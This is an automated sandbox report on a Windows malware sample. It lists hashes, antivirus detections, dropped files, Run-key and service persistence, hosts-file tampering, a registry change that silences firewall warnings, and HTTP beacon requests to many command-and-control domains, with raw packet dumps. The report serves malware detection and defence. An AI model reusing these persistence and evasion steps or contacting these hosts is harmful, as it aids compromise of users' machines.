Analysis Date2015-08-13 09:26:36
MD59e279cf2edd0125bb862459ed85b4e28
SHA127e071214ce9411f3119cb20bba289db5fa2b515

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 8b949b9fade7276c657b9cdd8ea0b986 sha1: 97c2932f80f23c0a0964562f29ded87615bc8bbb size: 785920
Section.rdata md5: 9f91c1a7bc86f11a0732c4f1cde40af3 sha1: 0a978aac51750c9d302b142e0bf76479bf17a58c size: 57856
Section.data md5: 14c6134f7b9829cbd73dc9251eb3c489 sha1: d795c6e996b92c22b9f5ed6d29c2731caaad3ca4 size: 391168
Timestamp2014-07-24 03:10:03
PackerMicrosoft Visual C++ ?.?
PEhashd4c169ab55d09a42c21b72c4064cb5dc9e8c833f
IMPhash11c08bde9052f29c5b863595154b187a
AVRisingno_virus
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. Webno_virus
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)no_virus
AVTrend MicroTROJ_WONTON.SMJ1
AVKasperskyTrojan.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusno_virus
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Nivdort.A.gen!Eldorado
AVMalwareBytesno_virus
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.AE
AVK7no_virus
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Kryptik.DDQD!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Kryptik.CCLE
AVAlwil (avast)no_virus
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterno_virus
AVAvira (antivir)TR/Crypt.Xpack.14701
AVMcafeeno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\system32\vipagashcugul\tst
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\oxs1as1liqt3zgbzllsp.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\oxs1as1liqt3zgbzllsp.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\oxs1as1liqt3zgbzllsp.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Interactive Shell Discovery UserMode UPnP ➝
C:\WINDOWS\system32\pkaplnprsbsz.exe
Creates FileC:\WINDOWS\system32\pkaplnprsbsz.exe
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\WINDOWS\system32\vipagashcugul\tst
Creates FileC:\WINDOWS\system32\vipagashcugul\etc
Creates FileC:\WINDOWS\system32\vipagashcugul\lck
Deletes FileC:\WINDOWS\system32\\drivers\etc\hosts
Creates ProcessC:\WINDOWS\system32\pkaplnprsbsz.exe
Creates ServiceVolume Drive WebClient Thread - C:\WINDOWS\system32\pkaplnprsbsz.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 800

Process
↳ Pid 848

Process
↳ C:\WINDOWS\System32\svchost.exe

Creates Filepipe\PCHFaultRepExecPipe

Process
↳ Pid 1204

Process
↳ Pid 1328

Process
↳ Pid 1864

Process
↳ Pid 1128

Process
↳ C:\WINDOWS\system32\pkaplnprsbsz.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝
1
Creates FileC:\WINDOWS\system32\vipagashcugul\lck
Creates FileC:\WINDOWS\system32\vipagashcugul\rng
Creates FileC:\WINDOWS\system32\joiikxvujea.exe
Creates FileC:\WINDOWS\system32\vipagashcugul\tst
Creates Filepipe\net\NtControlPipe10
Creates FileC:\WINDOWS\TEMP\oxs1as1saot3z.exe
Creates FileC:\WINDOWS\system32\vipagashcugul\run
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\vipagashcugul\cfg
Creates ProcessC:\WINDOWS\TEMP\oxs1as1saot3z.exe -r 39889 tcp
Creates ProcessWATCHDOGPROC "c:\windows\system32\pkaplnprsbsz.exe"

Process
↳ C:\WINDOWS\system32\pkaplnprsbsz.exe

Creates FileC:\WINDOWS\system32\vipagashcugul\tst

Process
↳ WATCHDOGPROC "c:\windows\system32\pkaplnprsbsz.exe"

Creates FileC:\WINDOWS\system32\vipagashcugul\tst

Process
↳ C:\WINDOWS\TEMP\oxs1as1saot3z.exe -r 39889 tcp

Creates File\Device\Afd\Endpoint
Winsock DNS239.255.255.250

Network Details:

DNSsaltsecond.net
Type: A
74.220.199.6
DNSplantshade.net
Type: A
50.63.202.32
DNSsensefloor.net
Type: A
202.221.184.226
DNSmuchcross.net
Type: A
195.22.26.252
DNSmuchcross.net
Type: A
195.22.26.253
DNSmuchcross.net
Type: A
195.22.26.254
DNSmuchcross.net
Type: A
195.22.26.231
DNSviewusual.net
Type: A
95.211.230.75
DNSlearnteach.net
Type: A
216.239.38.21
DNSlearnteach.net
Type: A
216.239.32.21
DNSlearnteach.net
Type: A
216.239.34.21
DNSlearnteach.net
Type: A
216.239.36.21
DNSsignarmy.net
Type: A
DNSsouthblood.net
Type: A
DNSwifeknew.net
Type: A
DNSrockknew.net
Type: A
DNSspendstudy.net
Type: A
DNSringfirst.net
Type: A
DNSpointdeal.net
Type: A
DNSplantthrew.net
Type: A
DNSfillthrew.net
Type: A
DNSplantcross.net
Type: A
DNSfillcross.net
Type: A
DNSfillshade.net
Type: A
DNSplantfloor.net
Type: A
DNSfillfloor.net
Type: A
DNSsensethrew.net
Type: A
DNSlearnthrew.net
Type: A
DNSsensecross.net
Type: A
DNSlearncross.net
Type: A
DNSsenseshade.net
Type: A
DNSlearnshade.net
Type: A
DNSlearnfloor.net
Type: A
DNStorethrew.net
Type: A
DNSfallthrew.net
Type: A
DNStorecross.net
Type: A
DNSfallcross.net
Type: A
DNStoreshade.net
Type: A
DNSfallshade.net
Type: A
DNStorefloor.net
Type: A
DNSfallfloor.net
Type: A
DNSweekthrew.net
Type: A
DNSverythrew.net
Type: A
DNSweekcross.net
Type: A
DNSverycross.net
Type: A
DNSweekshade.net
Type: A
DNSveryshade.net
Type: A
DNSweekfloor.net
Type: A
DNSveryfloor.net
Type: A
DNSpiecethrew.net
Type: A
DNSmuchthrew.net
Type: A
DNSpiececross.net
Type: A
DNSpieceshade.net
Type: A
DNSmuchshade.net
Type: A
DNSpiecefloor.net
Type: A
DNSmuchfloor.net
Type: A
DNSwaitthrew.net
Type: A
DNStakethrew.net
Type: A
DNSwaitcross.net
Type: A
DNStakecross.net
Type: A
DNSwaitshade.net
Type: A
DNStakeshade.net
Type: A
DNSwaitfloor.net
Type: A
DNStakefloor.net
Type: A
DNStriesusual.net
Type: A
DNSyourusual.net
Type: A
DNStriescould.net
Type: A
DNSyourcould.net
Type: A
DNStriesteach.net
Type: A
DNSyourteach.net
Type: A
DNStriesgrave.net
Type: A
DNSyourgrave.net
Type: A
DNSlrstnusual.net
Type: A
DNSlrstncould.net
Type: A
DNSviewcould.net
Type: A
DNSlrstnteach.net
Type: A
DNSviewteach.net
Type: A
DNSlrstngrave.net
Type: A
DNSviewgrave.net
Type: A
DNSplantusual.net
Type: A
DNSfillusual.net
Type: A
DNSplantcould.net
Type: A
DNSfillcould.net
Type: A
DNSplantteach.net
Type: A
DNSfillteach.net
Type: A
DNSplantgrave.net
Type: A
DNSfillgrave.net
Type: A
DNSsenseusual.net
Type: A
DNSlearnusual.net
Type: A
DNSsensecould.net
Type: A
DNSlearncould.net
Type: A
DNSsenseteach.net
Type: A
DNSsensegrave.net
Type: A
DNSlearngrave.net
Type: A
DNStoreusual.net
Type: A
DNSfallusual.net
Type: A
DNStorecould.net
Type: A
DNSfallcould.net
Type: A
DNStoreteach.net
Type: A
HTTP GEThttp://saltsecond.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
HTTP GEThttp://plantshade.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
HTTP GEThttp://sensefloor.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
HTTP GEThttp://muchcross.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
HTTP GEThttp://viewusual.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
HTTP GEThttp://learnteach.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
HTTP GEThttp://saltsecond.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
HTTP GEThttp://plantshade.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
HTTP GEThttp://sensefloor.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
HTTP GEThttp://muchcross.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
HTTP GEThttp://viewusual.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
HTTP GEThttp://learnteach.net/index.php?method=validate&mode=sox&v=030&sox=4324d400
User-Agent:
Flows TCP192.168.1.1:1036 ➝ 74.220.199.6:80
Flows TCP192.168.1.1:1037 ➝ 50.63.202.32:80
Flows TCP192.168.1.1:1038 ➝ 202.221.184.226:80
Flows TCP192.168.1.1:1040 ➝ 195.22.26.252:80
Flows TCP192.168.1.1:1041 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1042 ➝ 216.239.38.21:80
Flows TCP192.168.1.1:1043 ➝ 74.220.199.6:80
Flows TCP192.168.1.1:1044 ➝ 50.63.202.32:80
Flows TCP192.168.1.1:1045 ➝ 202.221.184.226:80
Flows TCP192.168.1.1:1046 ➝ 195.22.26.252:80
Flows TCP192.168.1.1:1047 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1048 ➝ 216.239.38.21:80
Flows TCP192.168.1.1:1053 ➝ 67.222.201.222:443

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 616c7473   ose..Host: salts
0x00000070 (00112)   65636f6e 642e6e65 740d0a0d 0a         econd.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2070 6c616e74   ose..Host: plant
0x00000070 (00112)   73686164 652e6e65 740d0a0d 0a         shade.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 656e7365   ose..Host: sense
0x00000070 (00112)   666c6f6f 722e6e65 740d0a0d 0a         floor.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206d 75636863   ose..Host: muchc
0x00000070 (00112)   726f7373 2e6e6574 0d0a0d0a 0a         ross.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2076 69657775   ose..Host: viewu
0x00000070 (00112)   7375616c 2e6e6574 0d0a0d0a 0a         sual.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206c 6561726e   ose..Host: learn
0x00000070 (00112)   74656163 682e6e65 740d0a0d 0a         teach.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 616c7473   ose..Host: salts
0x00000070 (00112)   65636f6e 642e6e65 740d0a0d 0a         econd.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2070 6c616e74   ose..Host: plant
0x00000070 (00112)   73686164 652e6e65 740d0a0d 0a         shade.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 656e7365   ose..Host: sense
0x00000070 (00112)   666c6f6f 722e6e65 740d0a0d 0a         floor.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206d 75636863   ose..Host: muchc
0x00000070 (00112)   726f7373 2e6e6574 0d0a0d0a 0a         ross.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2076 69657775   ose..Host: viewu
0x00000070 (00112)   7375616c 2e6e6574 0d0a0d0a 0a         sual.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3026736f   ode=sox&v=030&so
0x00000030 (00048)   783d3433 32346434 30302048 5454502f   x=4324d400 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206c 6561726e   ose..Host: learn
0x00000070 (00112)   74656163 682e6e65 740d0a0d 0a         teach.net....


Strings